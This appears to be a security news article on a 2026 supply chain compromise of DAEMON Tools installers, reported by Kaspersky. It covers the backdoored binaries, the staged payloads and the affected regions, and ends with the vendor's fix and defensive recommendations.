Update: Developer AVB Disc Soft confirmed that the incident was caused by unauthorised interference within its build environment, resulting in compromised installation packages being distributed. The company stated that affected files have been removed, internal systems secured, and the build pipeline audited. A new version of DAEMON Tools Lite, version 12.6.0.2445, was released, on May 5, 2026, reportedly within 12 hours of the issue being reported at approximately 07:00 GMT, and has been verified as clean. According to the vendor, the issue is now contained, and users downloading the latest version from official sources are no longer at risk.
A major supply chain attack targeting the widely used disk imaging software DAEMON Tools has been uncovered, with malicious installers distributed through official channels since early April 2026. According to findings published by Kaspersky, attackers compromised legitimate installers and embedded backdoors into signed binaries, allowing malware to be delivered under the guise of trusted software updates.
The campaign began on April 8, 2026, when multiple versions of DAEMON Tools (12.5.0.2421 to 12.5.0.2434) were trojanised. The infected installers were hosted on the software’s official website and signed using valid digital certificates belonging to developer AVB Disc Soft. This made the malicious packages appear authentic, significantly increasing the likelihood of successful infection. Researchers say the attack remains active as of early May, with infrastructure still operational.
Several core binaries, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe, were modified to include a hidden backdoor. Once installed, these components execute automatically at system startup and establish communication with an external command-and-control server. The attackers also used a domain designed to resemble legitimate DAEMON Tools website, further blending malicious activity with normal traffic. The malicious domain was registered just days before the campaign began, suggesting a carefully planned operation.
The attack follows a staged structure. In most cases, infected systems first receive an information-stealing payload that gathers system data such as MAC addresses, hostnames, installed software, running processes, network configuration, and system locale. This information is then sent to attacker-controlled servers and is likely used to profile compromised systems and assess their value for further exploitation. Interestingly, parts of this payload contain Chinese-language strings, hinting at a possible Chinese-speaking threat actor; however, no formal attribution has been made.
Despite thousands of infections observed globally, only a small subset of infected machines received additional malware beyond the initial payload. These higher-value targets were associated with organisations operating in the government, manufacturing, scientific research, and retail sectors. The selective nature of this deployment suggests that the operation was not purely opportunistic, but instead involved targeted objectives consistent with espionage or strategic intrusion activity.
Among the second-stage tools identified was a minimalistic backdoor capable of executing commands, downloading files, and running code directly in memory. In at least one confirmed case, a more advanced implant known as QUIC RAT was deployed. This malware supports multiple communication protocols, including HTTP, TCP, DNS, and QUIC, and can inject code into legitimate processes such as notepad.exe.
Telemetry data shows thousands of infection attempts across more than 100 countries. The highest number of affected systems was recorded in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Around ten percent of affected systems belonged to organisations, while most systems only received the initial data-collection stage.
Security tools from Kaspersky reportedly detect the malicious activity at multiple stages, including suspicious PowerShell-based downloads, malware execution from temporary directories, code injection into legitimate processes, and unusual outbound network traffic. Organisations are advised to carry out audits of systems where DAEMON Tools was installed after 8 April 2026. It is also recommended to monitor systems for unusual command-line activity, particularly involving PowerShell. In addition, organisations are encouraged to implement zero-trust security models and restrict execution from temporary directories.
The DAEMON Tools compromise demonstrates how attackers continue to refine supply chain tactics, combining large-scale distribution with precise targeting. With trusted software increasingly becoming an entry point for advanced threats, organisations must treat even legitimate applications as potential risk vectors and adopt layered, proactive defence strategies.
7 Comments
Load the comments and join the conversation!
Read the comments, ask the editors questions, show respect and join the conversation.